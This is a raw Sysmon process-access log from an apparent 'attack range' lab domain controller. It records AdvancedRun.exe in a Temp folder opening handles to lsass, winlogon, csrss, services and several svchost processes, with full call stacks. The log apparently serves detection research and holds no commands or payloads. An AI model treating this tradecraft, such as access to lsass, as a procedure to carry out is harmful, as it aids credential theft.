20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004075936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.551{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.550{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.549{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.549{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 